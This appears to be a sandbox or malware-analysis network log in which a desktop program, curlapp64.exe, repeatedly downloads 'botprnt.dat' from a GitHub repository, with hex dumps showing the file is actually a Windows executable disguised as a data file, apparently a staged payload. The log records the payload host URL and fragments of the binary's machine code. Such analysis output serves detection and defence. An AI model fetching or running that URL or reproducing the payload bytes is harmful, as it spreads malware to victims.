                                                                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                3192.168.2.549717185.199.110.1334435680C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:46:10 UTC99OUTGET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1
                                                                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:46:11 UTC901INHTTP/1.1 200 OK
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 15149056
                                                                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                ETag: "61c8fa303e2f0fb491ca9c63dfa1f4c2a4bf84b67e0dd41dcad04d02dc6078c1"
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-GitHub-Request-Id: 3B8A:230C89:CD5FCD:E3E1EA:6729E95E
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:46:11 GMT
                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                X-Served-By: cache-dfw-kdfw8210073-DFW
                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                X-Timer: S1730799971.029007,VS0,VE1
                                                                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                X-Fastly-Request-ID: 69994fda9efc99555c447884f6cd7f598b1d459f
                                                                                                                                                                                                Expires: Tue, 05 Nov 2024 09:51:11 GMT
                                                                                                                                                                                                Source-Age: 2
                                                                                                                                                                                                2024-11-05 09:46:11 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 68 d4 28 67 00 00 00 00 00 00 00 00 f0 00 2e 22 0b 02 02 27 00 42 00 00 00 24 e7 00 00 02 00 00 20 13 00 00 00 10 00 00 00 00 85 45 03 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 b0 e7 00 00 04 00 00 58 09 e8 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdh(g."'B$ EX`
                                                                                                                                                                                                2024-11-05 09:46:11 UTC1378INData Raw: 00 00 00 eb 81 66 0f 1f 84 00 00 00 00 00 31 c0 48 87 03 eb 9c 66 0f 1f 84 00 00 00 00 00 48 8b 15 c9 1b e7 00 c7 06 01 00 00 00 48 8b 0d ac 1b e7 00 e8 9f 3c 00 00 e9 66 ff ff ff 66 90 48 8b 15 89 1b e7 00 48 8b 0d 72 1b e7 00 e8 85 3c 00 00 c7 06 02 00 00 00 e9 51 ff ff ff 66 90 b9 1f 00 00 00 e8 86 3a 00 00 e9 35 ff ff ff 90 41 54 55 57 56 53 48 83 ec 20 4c 8b 25 0f 1b e7 00 85 d2 48 89 ce 89 d3 41 89 14 24 4c 89 c7 75 47 8b 05 21 3e e7 00 85 c0 74 5f e8 d0 2e 00 00 49 89 f8 89 da 48 89 f1 e8 c9 2a 00 00 89 c5 85 db 0f 84 b1 00 00 00 83 fb 03 0f 84 a8 00 00 00 89 e8 41 c7 04 24 ff ff ff ff 48 83 c4 20 5b 5e 5f 5d 41 5c c3 0f 1f 00 e8 93 2e 00 00 8d 43 ff 49 89 f8 89 da 83 f8 01 48 89 f1 0f 87 a7 00 00 00 e8 ba fd ff ff 85 c0 75 06 31 ed eb c2 66 90 49
                                                                                                                                                                                                Data Ascii: f1HfHH<ffHHr<Qf:5ATUWVSH L%HA$LuG!>t_.IH*A$H [^_]A\.CIHu1fI
                                                                                                                                                                                                2024-11-05 09:46:11 UTC1378INData Raw: ff ff 88 45 f1 0f b6 45 f2 0f b6 c0 89 c1 e8 99 fc ff ff 88 45 f2 0f b6 55 ef 8b 45 fc c1 e8 02 89 c1 48 8d 05 33 0b e7 00 0f b6 04 01 31 d0 88 45 ef 8b 45 fc c1 e0 02 89 45 f8 8b 45 fc 83 e8 04 c1 e0 02 89 45 f4 8b 45 f4 48 8b 55 10 48 01 d0 44 0f b6 00 0f b6 4d ef 8b 45 f8 48 8b 55 10 48 01 c2 44 89 c0 31 c8 88 02 8b 45 f4 83 c0 01 89 c2 48 8b 45 10 48 01 d0 44 0f b6 00 0f b6 4d f0 8b 45 f8 83 c0 01 89 c2 48 8b 45 10 48 01 c2 44 89 c0 31 c8 88 02 8b 45 f4 83 c0 02 89 c2 48 8b 45 10 48 01 d0 44 0f b6 00 0f b6 4d f1 8b 45 f8 83 c0 02 89 c2 48 8b 45 10 48 01 c2 44 89 c0 31 c8 88 02 8b 45 f4 83 c0 03 89 c2 48 8b 45 10 48 01 d0 44 0f b6 00 0f b6 4d f2 8b 45 f8 83 c0 03 89 c2 48 8b 45 10 48 01 c2 44 89 c0 31 c8 88 02 83 45 fc 01 83 7d fc 2b 0f 86 47 fe ff ff
                                                                                                                                                                                                Data Ascii: EEEUEH31EEEEEEHUHDMEHUHD1EHEHDMEHEHD1EHEHDMEHEHD1EHEHDMEHEHD1E}+G
                                                                                                                                                                                                2024-11-05 09:46:11 UTC1378INData Raw: 89 d0 48 89 c2 b9 0a 00 00 00 e8 ed fb ff ff c6 45 ff 09 48 8b 45 10 48 89 c1 e8 87 fc ff ff 48 8b 45 10 48 89 c1 e8 5e fd ff ff 0f b6 45 ff 48 8b 4d 18 48 8b 55 10 49 89 c8 89 c1 e8 bb fb ff ff 80 7d ff 00 74 12 48 8b 45 10 48 89 c1 e8 b8 fd ff ff 80 6d ff 01 eb ba 90 90 48 83 c4 30 5d c3 55 56 53 48 83 ec 30 48 8d 6c 24 30 48 89 4d 20 c6 45 ff 00 eb 5c c6 45 fe 00 eb 4c 0f b6 45 fe 0f b6 55 ff 48 8b 4d 20 48 63 d2 48 98 48 c1 e0 02 48 01 c8 48 01 d0 0f b6 00 0f b6 c0 0f b6 5d fe 0f b6 75 ff 89 c1 e8 9d f6 ff ff 89 c2 4c 8b 45 20 48 63 ce 48 63 c3 48 c1 e0 02 4c 01 c0 48 01 c8 88 10 80 45 fe 01 80 7d fe 03 76 ae 80 45 ff 01 80 7d ff 03 76 9e 90 90 48 83 c4 30 5b 5e 5d c3 55 48 89 e5 48 83 ec 10 48 89 4d 10 48 8b 45 10 0f b6 40 01 88 45 ff 48 8b 45 10 0f
                                                                                                                                                                                                Data Ascii: HEHEHHEH^EHMHUI}tHEHmH0]UVSH0Hl$0HM E\ELEUHM HcHHHH]uLE HcHcHLHE}vE}vH0[^]UHHHMHE@EHE
                                                                                                                                                                                                2024-11-05 09:46:11 UTC1378INData Raw: 00 00 48 8b 45 18 48 89 c1 e8 35 f6 ff ff 48 8b 45 10 48 8d 88 b0 00 00 00 48 8d 45 e0 41 b8 10 00 00 00 48 89 c2 e8 06 f3 ff ff 48 83 45 18 10 48 83 45 f8 10 48 8b 45 f8 48 3b 45 20 72 92 90 90 48 83 c4 40 5d c3 55 48 89 e5 48 83 ec 30 48 89 4d 10 48 89 55 18 4c 89 45 20 48 83 7d 10 00 0f 84 ad 00 00 00 48 8b 45 10 48 8b 40 08 48 85 c0 0f 85 9c 00 00 00 48 83 7d 20 00 0f 84 91 00 00 00 48 8b 45 20 48 83 c0 01 01 c0 66 89 45 fe 0f b7 45 fe 48 89 c1 e8 54 2c 00 00 48 89 c2 48 8b 45 10 48 89 50 08 48 8b 45 10 48 8b 40 08 48 85 c0 75 07 b8 ff ff ff ff eb 5d 0f b7 55 fe 48 8b 45 10 48 8b 40 08 49 89 d0 ba 00 00 00 00 48 89 c1 e8 21 2b 00 00 0f b7 4d fe 48 8b 45 10 48 8b 40 08 48 8b 55 18 49 89 c8 48 89 c1 e8 d6 2b 00 00 0f b7 45 fe 8d 50 fe 48 8b 45 10 66 89
                                                                                                                                                                                                Data Ascii: HEH5HEHHEAHHEHEHEH;E rH@]UHH0HMHULE H}HEH@HH} HE HfEEHT,HHEHPHEH@Hu]UHEH@IH!+MHEH@HUIH+EPHEf
                                                                                                                                                                                                2024-11-05 09:46:11 UTC1378INData Raw: c7 85 34 01 00 00 30 00 00 00 8b 85 34 01 00 00 65 48 8b 00 48 89 85 28 01 00 00 48 8b 85 28 01 00 00 48 8b 40 60 48 8b 40 30 48 8b 95 88 01 00 00 49 89 d0 ba 00 00 00 00 48 89 c1 41 ff d1 4c 8b 0d f8 28 e7 00 c7 85 24 01 00 00 30 00 00 00 8b 85 24 01 00 00 65 48 8b 00 48 89 85 18 01 00 00 48 8b 85 18 01 00 00 48 8b 40 60 48 8b 40 30 48 8b 95 90 01 00 00 49 89 d0 ba 00 00 00 00 48 89 c1 41 ff d1 48 8b 15 c2 28 e7 00 48 8b 85 90 00 00 00 48 89 c1 ff d2 8b 85 9c 01 00 00 e9 f3 04 00 00 4c 8b 0d 8c 28 e7 00 c7 85 14 01 00 00 30 00 00 00 8b 85 14 01 00 00 65 48 8b 00 48 89 85 08 01 00 00 48 8b 85 08 01 00 00 48 8b 40 60 48 8b 40 30 41 b8 c8 00 00 00 ba 08 00 00 00 48 89 c1 41 ff d1 48 89 85 78 01 00 00 48 83 bd 78 01 00 00 00 0f 85 f0 00 00 00 4c 8b 0d 3d 28
                                                                                                                                                                                                Data Ascii: 404eHH(H(H@`H@0HIHAL($0$eHHHH@`H@0HIHAH(HHL(0eHHHH@`H@0AHAHxHxL=(
                                                                                                                                                                                                2024-11-05 09:46:11 UTC1378INData Raw: 40 60 48 8b 40 30 48 8b 95 80 01 00 00 49 89 d0 ba 00 00 00 00 48 89 c1 41 ff d1 48 8b 15 ca 23 e7 00 48 8b 85 90 00 00 00 48 89 c1 ff d2 8b 85 9c 01 00 00 48 81 c4 28 02 00 00 5f 5d c3 55 48 89 e5 48 83 ec 30 48 89 4d 10 c7 45 fc 00 00 00 00 48 c7 45 f0 00 00 00 00 48 8b 05 94 23 e7 00 48 8d 55 f0 48 8b 4d 10 49 89 d1 49 89 c8 ba 00 00 00 00 b9 00 00 00 00 ff d0 89 45 fc 83 7d fc 00 78 15 48 8b 15 72 23 e7 00 48 8b 45 f0 48 89 c1 ff d2 8b 45 fc eb 03 8b 45 fc 48 83 c4 30 5d c3 55 48 81 ec 60 02 00 00 48 8d ac 24 80 00 00 00 48 89 8d f0 01 00 00 c7 85 bc 01 00 00 60 00 00 00 8b 85 bc 01 00 00 65 48 8b 00 48 89 85 b0 01 00 00 48 8b 85 b0 01 00 00 48 89 85 c8 01 00 00 48 8b 85 c8 01 00 00 48 8b 40 18 48 89 85 c0 01 00 00 48 8b 85 c0 01 00 00 48 8b 40 20 48
                                                                                                                                                                                                Data Ascii: @`H@0HIHAH#HHH(_]UHH0HMEHEH#HUHMIIE}xHr#HEHEEH0]UH`H$H`eHHHHHH@HHH@ H
                                                                                                                                                                                                2024-11-05 09:46:11 UTC1378INData Raw: 00 4c 8d 05 8a f0 e6 00 ba 10 00 00 00 48 8d 05 1e 2f 00 00 48 89 c1 e8 36 1e 00 00 48 8d 85 90 02 00 00 48 89 c1 e8 14 fb ff ff 48 89 85 c8 02 00 00 48 83 bd c8 02 00 00 00 75 0a b8 ff ff ff ff e9 04 07 00 00 48 c7 85 60 02 00 00 00 00 00 00 48 c7 85 68 02 00 00 00 00 00 00 48 c7 85 70 02 00 00 00 00 00 00 48 c7 85 78 02 00 00 00 00 00 00 48 c7 85 80 02 00 00 00 00 00 00 48 c7 44 24 28 09 00 00 00 48 8d 85 60 02 00 00 48 89 44 24 20 4c 8d 0d 79 f0 e6 00 4c 8d 05 52 f0 e6 00 ba 10 00 00 00 48 8d 05 96 2e 00 00 48 89 c1 e8 9e 1d 00 00 48 8d 85 60 02 00 00 48 89 c1 e8 7c fa ff ff 48 89 85 c0 02 00 00 48 83 bd c0 02 00 00 00 75 0a b8 ff ff ff ff e9 6c 06 00 00 48 c7 85 53 02 00 00 00 00 00 00 48 c7 85 58 02 00 00 00 00 00 00 48 c7 85 47 02 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii: LH/H6HHHHuH`HhHpHxHHD$(H`HD$ LyLRH.HH`H|HHulHSHXHG
                                                                                                                                                                                                2024-11-05 09:46:11 UTC1378INData Raw: 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 30 02 00 00 48 89 50 08 48 8b 15 02 f5 e6 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 10 02 00 00 48 89 50 08 48 8b 15 ba f4 e6 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 08 02 00 00 48 89 50 08 48 8b 15 62 f4 e6 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 f0 01 00 00 48 89 50 08 48 8b 15 5a f4 e6 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 d0 01 00 00 48 89 50 08 48 8b 15 52 f4 e6 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 00 00 00 00 48 8d 95 c0 01 00 00 48 89 50 08 48 c7 40 10 00 00 00 00 48 8d 15 22 18 e7 00 48 89 50 18 48 83 c0 20 c7 00 00 00 00 00 48 8d 95
                                                                                                                                                                                                Data Ascii: H H0HPHHPH@H HHPHHPH@H HHPHbHPH@H HHPHZHPH@H HHPHRHPH@H HHPH@H"HPH H
                                                                                                                                                                                                2024-11-05 09:46:11 UTC1378INData Raw: 91 e6 ff ff 89 85 5c 06 00 00 83 bd 5c 06 00 00 00 78 26 48 8d 85 10 06 00 00 48 89 c1 e8 f6 ef ff ff ba d8 0e 00 00 b9 4c 04 00 00 e8 4d 14 00 00 48 89 c1 e8 a5 14 00 00 48 8d 85 10 06 00 00 48 89 c1 e8 ec e5 ff ff 48 8d 85 00 06 00 00 48 89 c1 e8 dd e5 ff ff eb 01 90 48 81 c4 e8 06 00 00 5f 5d c3 55 48 89 e5 48 89 4d 10 89 55 18 4c 89 45 20 b8 01 00 00 00 5d c3 90 90 90 90 49 89 ca 8b 05 87 db e6 00 0f 05 c3 49 89 ca 8b 05 7f db e6 00 0f 05 c3 49 89 ca 8b 05 77 db e6 00 0f 05 c3 49 89 ca 8b 05 6f db e6 00 0f 05 c3 49 89 ca 8b 05 6b db e6 00 0f 05 c3 49 89 ca 8b 05 5b db e6 00 0f 05 c3 49 89 ca 8b 05 57 db e6 00 0f 05 c3 66 2e 0f 1f 84 00 00 00 00 00 66 90 48 83 ec 28 48 8b 05 45 db e6 00 48 8b 00 48 85 c0 74 22 0f 1f 44 00 00 ff d0 48 8b 05 2f db e6 00
                                                                                                                                                                                                Data Ascii: \\x&HHLMHHHHHH_]UHHMULE ]IIIwIoIkI[IWf.fH(HEHHt"DH/


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                4192.168.2.549724140.82.121.44431892C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:46:19 UTC89OUTHEAD /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1
                                                                                                                                                                                                Host: github.com
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:46:20 UTC550INHTTP/1.1 302 Found
                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:46:07 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                Access-Control-Allow-Origin:
                                                                                                                                                                                                Location: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dat
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                2024-11-05 09:46:20 UTC3382INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                5192.168.2.552628185.199.110.1334431892C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:46:20 UTC100OUTHEAD /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1
                                                                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:46:20 UTC902INHTTP/1.1 200 OK
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 15149056
                                                                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                ETag: "61c8fa303e2f0fb491ca9c63dfa1f4c2a4bf84b67e0dd41dcad04d02dc6078c1"
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-GitHub-Request-Id: 3B8A:230C89:CD5FCD:E3E1EA:6729E95E
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:46:20 GMT
                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                X-Served-By: cache-dfw-kdfw8210130-DFW
                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                X-Timer: S1730799981.902855,VS0,VE1
                                                                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                X-Fastly-Request-ID: 4d9bbe0afe607eab34430ca801749e18b1d5fa20
                                                                                                                                                                                                Expires: Tue, 05 Nov 2024 09:51:20 GMT
                                                                                                                                                                                                Source-Age: 12


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                6192.168.2.552629140.82.121.44431892C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:46:21 UTC88OUTGET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1
                                                                                                                                                                                                Host: github.com
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:46:22 UTC550INHTTP/1.1 302 Found
                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:46:07 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                Access-Control-Allow-Origin:
                                                                                                                                                                                                Location: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dat
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                2024-11-05 09:46:22 UTC3382INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                7192.168.2.552634185.199.110.1334431892C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:46:22 UTC99OUTGET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1
                                                                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:46:22 UTC902INHTTP/1.1 200 OK
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 15149056
                                                                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                ETag: "61c8fa303e2f0fb491ca9c63dfa1f4c2a4bf84b67e0dd41dcad04d02dc6078c1"
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-GitHub-Request-Id: 3B8A:230C89:CD5FCD:E3E1EA:6729E95E
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:46:22 GMT
                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                X-Served-By: cache-dfw-kdal2120090-DFW
                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                X-Timer: S1730799983.808505,VS0,VE1
                                                                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                X-Fastly-Request-ID: c69ede0c81cc619d6246dc4cec9b313b1b3cd220
                                                                                                                                                                                                Expires: Tue, 05 Nov 2024 09:51:22 GMT
                                                                                                                                                                                                Source-Age: 14
                                                                                                                                                                                                2024-11-05 09:46:22 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 68 d4 28 67 00 00 00 00 00 00 00 00 f0 00 2e 22 0b 02 02 27 00 42 00 00 00 24 e7 00 00 02 00 00 20 13 00 00 00 10 00 00 00 00 85 45 03 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 b0 e7 00 00 04 00 00 58 09 e8 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdh(g."'B$ EX`
                                                                                                                                                                                                2024-11-05 09:46:22 UTC1378INData Raw: 00 00 00 eb 81 66 0f 1f 84 00 00 00 00 00 31 c0 48 87 03 eb 9c 66 0f 1f 84 00 00 00 00 00 48 8b 15 c9 1b e7 00 c7 06 01 00 00 00 48 8b 0d ac 1b e7 00 e8 9f 3c 00 00 e9 66 ff ff ff 66 90 48 8b 15 89 1b e7 00 48 8b 0d 72 1b e7 00 e8 85 3c 00 00 c7 06 02 00 00 00 e9 51 ff ff ff 66 90 b9 1f 00 00 00 e8 86 3a 00 00 e9 35 ff ff ff 90 41 54 55 57 56 53 48 83 ec 20 4c 8b 25 0f 1b e7 00 85 d2 48 89 ce 89 d3 41 89 14 24 4c 89 c7 75 47 8b 05 21 3e e7 00 85 c0 74 5f e8 d0 2e 00 00 49 89 f8 89 da 48 89 f1 e8 c9 2a 00 00 89 c5 85 db 0f 84 b1 00 00 00 83 fb 03 0f 84 a8 00 00 00 89 e8 41 c7 04 24 ff ff ff ff 48 83 c4 20 5b 5e 5f 5d 41 5c c3 0f 1f 00 e8 93 2e 00 00 8d 43 ff 49 89 f8 89 da 83 f8 01 48 89 f1 0f 87 a7 00 00 00 e8 ba fd ff ff 85 c0 75 06 31 ed eb c2 66 90 49
                                                                                                                                                                                                Data Ascii: f1HfHH<ffHHr<Qf:5ATUWVSH L%HA$LuG!>t_.IH*A$H [^_]A\.CIHu1fI
